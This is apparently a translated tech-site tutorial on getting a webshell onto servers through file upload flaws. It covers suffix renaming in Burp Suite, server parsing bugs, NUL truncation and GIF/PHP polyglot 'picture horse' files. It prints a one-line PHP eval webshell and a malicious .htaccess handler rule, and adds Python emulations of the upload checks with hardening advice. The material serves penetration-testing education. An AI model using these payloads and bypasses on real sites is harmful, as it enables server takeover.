2025-02-27 Update From: SLTechnology News&Howtos (Network Security)
Shulou (Shulou.com) 06/01 Report
Among all vulnerability classes, file upload is the most direct and effective way to get code execution on a server. It is not easy to exploit well, though, because the upload tricks come in so many shapes. Below are some simple upload techniques; experts, please go easy on me.
Conditions for uploading a shell:
1. An upload point
2. The absolute path of the uploaded file, so you can reach it afterwards
3. Execute permission: the upload directory must be one the web server will run scripts from
File upload check types
1. Client-side JavaScript check (usually only checks the suffix)
2. Server-side checks
① Content-Type header field check (e.g. image/gif)
② File content header check (e.g. GIF89a)
③ Suffix blacklist check
④ Suffix whitelist check
⑤ Custom regular-expression check
3. WAF check (depends on the WAF product)
Start uploading (try a small one-line shell first, then the big shell, because the big one is more likely to be caught)
1. Upload the shell directly, i.e. a .php file (no restriction on file type)
2. Change the suffix
Upload a file in an allowed format such as .png or .jpg, intercept the request with Burp Suite, and change the suffix to .php.
This defeats front-end blacklist/whitelist checks. How to tell it is a front-end check: the error dialog pops up when you browse to and load the file, before you click the upload button (for example, "only .jpg / .jpeg / .png files may be uploaded"), and no packet has been sent at that point. It is usually a JavaScript script.
3. Exploit a parsing vulnerability (e.g. append /xx.php after the absolute path of the uploaded file)
Upload a file such as .png and rely on a parsing bug in the web server (older IIS 6.0, IIS 7.0, IIS 7.5, Nginx). The IIS 7.x / Nginx variant works when PHP runs with cgi.fix_pathinfo=1, so that picture.png/xx.php is handed to PHP as picture.png; IIS 6.0 instead treats names such as x.asp;.jpg, or anything inside a directory named *.asp, as ASP.
4. Unrecognized suffix (server-side blacklist check)
Upload a file such as shell.php.abc. Apache does not know the .abc suffix, so it falls back on a suffix it does recognize.
This applies only to Apache. mod_mime treats every dot-separated part of the name as an extension and simply ignores the ones it does not know, so a handler bound to .php with AddHandler still applies to test.php.abcd. If an upload page blocks .php through a blacklist, renaming the file to test.php.abcd can get it past the check. Caveat: it only works when PHP is bound with AddHandler/AddType; distributions that bind PHP through <FilesMatch "\.ph(ar|p|tml)$"> SetHandler ... are not affected, because the regex is anchored at the end of the name.
5. 00 truncation
Upload a file named like shell.php.jpg, switch Burp Suite to the hex view of the request, find shell.php.jpg, change the byte of the second dot (0x2e, as I recall) to 0x00, then click Forward to release the packet. The file API stops at the NUL byte, so the file is written as shell.php while the suffix check saw the part ending in jpg. Caveat: this needs PHP older than 5.3.4; from that version on a NUL byte in a path is rejected.
6. Picture horse
In a Windows cmd prompt you can easily merge a PHP file with a .jpg or .png, for example copy /b 1.jpg+1.php shell.jpg, which appends the code after the image data. Some servers check the image header and refuse uploads that do not start with one; merging the code into a picture hides the * from that check. Remember that the result is still stored as a picture: to get it executed as PHP you still need one of the methods above (a parsing vulnerability, or the .htaccess trick below).
(This defeats the server's file content header check ②; the Content-Type field ① is changed separately in the intercepted request.)
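The following is an added example, not code from the original article: it builds the raw multipart/form-data body that an upload form sends, so the filename and Content-Type edits made in Burp Suite under items 2, 5 and 6 can be reproduced offline, and runs the result through simplified emulations of the four server-side checks listed earlier (Content-Type field, file content header, suffix blacklist, suffix whitelist) plus a model of the NUL truncation from item 5. The endpoint rules, the GIF89a+PHP sample payload and the shell.php\x00.jpg form of the truncated name are constructed for the demo; hardened_check() is an added suggestion, not something the article describes.

```python
import re

# Constructed sample payload: a GIF header glued in front of a one-line PHP
# shell, which is what `copy /b 1.gif+1.php shell.gif` produces (item 6).
GIF_HEADER = b"GIF89a"
PHP_SHELL = b"<?php @eval($_POST['x']); ?>"
POLYGLOT = GIF_HEADER + PHP_SHELL

# Rules of the emulated upload endpoint (assumed for the demo).
BLACKLIST = {"php", "php3", "php5", "phtml"}
WHITELIST = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = (b"GIF87a", b"GIF89a", b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n")


def build_multipart(field, filename, content_type, data, boundary="----demo"):
    """Raw multipart/form-data body. `filename` and `content_type` are the two
    header fields an attacker rewrites in Burp before forwarding the request."""
    head = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    ).encode("latin-1")
    return head + data + f"\r\n--{boundary}--\r\n".encode()


def parse_multipart(body):
    """Minimal parser for the single-part body above -> (filename, content_type, data)."""
    head, _, rest = body.partition(b"\r\n\r\n")
    filename = re.search(rb'filename="([^"]*)"', head).group(1)
    ctype = re.search(rb"Content-Type: ([^\r\n]+)", head).group(1).decode()
    data = rest.rsplit(b"\r\n--", 1)[0]
    return filename, ctype, data


def suffix(filename):
    """Suffix after the last dot, the way a naive check (strrchr/pathinfo) sees it."""
    if b"." not in filename:
        return ""
    return filename.rsplit(b".", 1)[-1].lower().decode("latin-1")


def check_content_type(ctype):   # server check ①: Content-Type header field
    return ctype.startswith("image/")

def check_magic(data):           # server check ②: file content header
    return data.startswith(IMAGE_MAGIC)

def check_blacklist(filename):   # server check ③: suffix blacklist
    return suffix(filename) not in BLACKLIST

def check_whitelist(filename):   # server check ④: suffix whitelist
    return suffix(filename) in WHITELIST


def stored_name(filename):
    """Model of a NUL-terminated file API (PHP before 5.3.4 on top of C):
    the name that reaches the filesystem stops at the first 0x00 byte."""
    return filename.split(b"\x00", 1)[0]


def evaluate(body):
    """Run one crafted request through all four checks and report what would be written."""
    filename, ctype, data = parse_multipart(body)
    return {
        "content_type": check_content_type(ctype),
        "magic": check_magic(data),
        "blacklist": check_blacklist(filename),
        "whitelist": check_whitelist(filename),
        "stored_as": stored_name(filename).decode("latin-1"),
    }


def hardened_check(filename, data):
    """What the endpoint should do instead (added suggestion): refuse control
    bytes, allow exactly one extension, judge it on the name that will really
    be written, require a matching image header, ignore the client Content-Type."""
    if any(b < 0x20 for b in filename):
        return False
    name = stored_name(filename)
    if name.count(b".") != 1 or suffix(name) not in WHITELIST:
        return False
    return check_magic(data)


if __name__ == "__main__":
    cases = {
        "item 2: renamed in Burp":       ("shell.php",         "image/jpeg", POLYGLOT),
        "item 5: NUL before .jpg":       ("shell.php\x00.jpg", "image/jpeg", POLYGLOT),
        "item 6: picture horse as .jpg": ("shell.jpg",         "image/jpeg", POLYGLOT),
        "honest php upload":             ("shell.php", "application/octet-stream", PHP_SHELL),
    }
    for label, (fn, ct, data) in cases.items():
        print(label, evaluate(build_multipart("file", fn, ct, data)))
```

Running the script prints, per case, which checks pass and which name would be written. The contrast is the point: the NUL case passes all four checks yet is stored as shell.php, while the picture-horse case also passes everything but is stored as shell.jpg, which still needs a parsing bug or the .htaccess trick to execute. hardened_check() refuses control bytes and double extensions and judges the name that will actually be written; in practice, also let the server pick a random file name and store uploads where scripts are not executed.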
7. .htaccess file * upload shell (server-side blacklist check)
The .htaccess file is a per-directory configuration file for the Apache server. Through it you can set up 301 redirects, custom 404 pages, changes to how file extensions are handled, allowing or blocking access for specific users or directories, disabling directory listings, configuring default documents, and more.
① Write the .htaccess file
The content to use is as follows:
<FilesMatch "cimer">
SetHandler application/x-httpd-php
</FilesMatch>
(Through this .htaccess file, Apache hands any file whose name contains the string "cimer" to the PHP parser. This only works if the upload directory allows .htaccess overrides, i.e. AllowOverride FileInfo or All.)
Then save it with the name .htaccess (no base name, only the extension).
② Upload the .htaccess file
③ Change the shell's suffix to cimer
④ Upload shell.cimer
⑤ Connect to it with your webshell client
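Added example, not from the article, that models how Apache picks a handler for an uploaded file name under the two PHP bindings behind item 4 (AddHandler, where mod_mime evaluates every extension and skips unknown ones) and item 7 (a FilesMatch/SetHandler rule, which an uploaded .htaccess can add). The .htaccess text is the article's; the matching logic is a simplified emulation written for this page, not Apache's code, and DISTRO_PHP_RULES is assumed to match the FilesMatch pattern Debian-style php-apache packages ship.

```python
import re

# Binding A: `AddHandler application/x-httpd-php .php` (mod_mime).
# Every dot-separated part of the name is an extension; unknown parts are
# ignored, and a handler set by one extension is not cleared by a later one.
ADDHANDLER = {"php": "application/x-httpd-php"}


def handler_via_addhandler(filename):
    """Emulated mod_mime handler selection for a base name such as shell.php.abcd."""
    handler = "default-handler"
    for ext in filename.lower().split(".")[1:]:
        if ext in ADDHANDLER:          # .php sets the handler ...
            handler = ADDHANDLER[ext]  # ... and .jpg / .abcd after it never clear it
    return handler


# Binding B: `<FilesMatch "\.ph(ar|p|tml)$"> SetHandler application/x-httpd-php`
# (assumed to be the pattern used by Debian-style php-apache packages).
DISTRO_PHP_RULES = [(r"\.ph(ar|p|tml)$", "application/x-httpd-php")]


def parse_htaccess(text):
    """Extract (regex, handler) pairs from <FilesMatch "..."> SetHandler ... </FilesMatch> blocks."""
    pat = r'<FilesMatch\s+"([^"]+)">\s*SetHandler\s+(\S+)\s*</FilesMatch>'
    return re.findall(pat, text)


def handler_via_filesmatch(filename, rules):
    """FilesMatch is a regex *search* on the base name (not anchored unless the
    regex is); where several rules match, the last one listed wins."""
    handler = "default-handler"
    for regex, h in rules:
        if re.search(regex, filename):
            handler = h
    return handler


# The article's .htaccess, exactly as item 7 writes it.
HTACCESS_TEXT = '<FilesMatch "cimer">\nSetHandler application/x-httpd-php\n</FilesMatch>\n'

# Effective rules in an upload directory that honours the uploaded .htaccess.
UPLOAD_DIR_RULES = DISTRO_PHP_RULES + parse_htaccess(HTACCESS_TEXT)


if __name__ == "__main__":
    for name in ("shell.php", "shell.php.abcd", "shell.jpg", "shell.cimer"):
        print(f"{name:16} AddHandler -> {handler_via_addhandler(name)}")
        print(f"{'':16} FilesMatch -> {handler_via_filesmatch(name, DISTRO_PHP_RULES)}")
        print(f"{'':16} + .htaccess -> {handler_via_filesmatch(name, UPLOAD_DIR_RULES)}")
```

The output shows why the two tricks are separate: shell.php.abcd reaches the PHP handler only under AddHandler, and shell.cimer reaches it only once the uploaded .htaccess adds its rule. Blocking the .htaccess name in the upload filter is not enough on its own; set AllowOverride None on the upload directory (or disable the PHP engine there, e.g. php_flag engine off in the server config) so that a file the attacker writes cannot change how its neighbours are served.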
If that is unclear, see http://www.sohu.com/a/125498727_609556.
There are many ways to upload, with all kinds of odd bypasses; what I know is just a drop in the bucket. Here are a few odd cases recorded so I do not forget them.
Example: in the Pirate Cloud Merchant member area, change your avatar, capture the request with Burp Suite, and add a file size below the Content-Type line to getshell.
Or add * after the uploaded image to getshell (one catch: there is no semicolon here, and it does not succeed if a semicolon is present).
https://www.cnblogs.com/shellr00t/p/6426945.html is a good reference; take a look.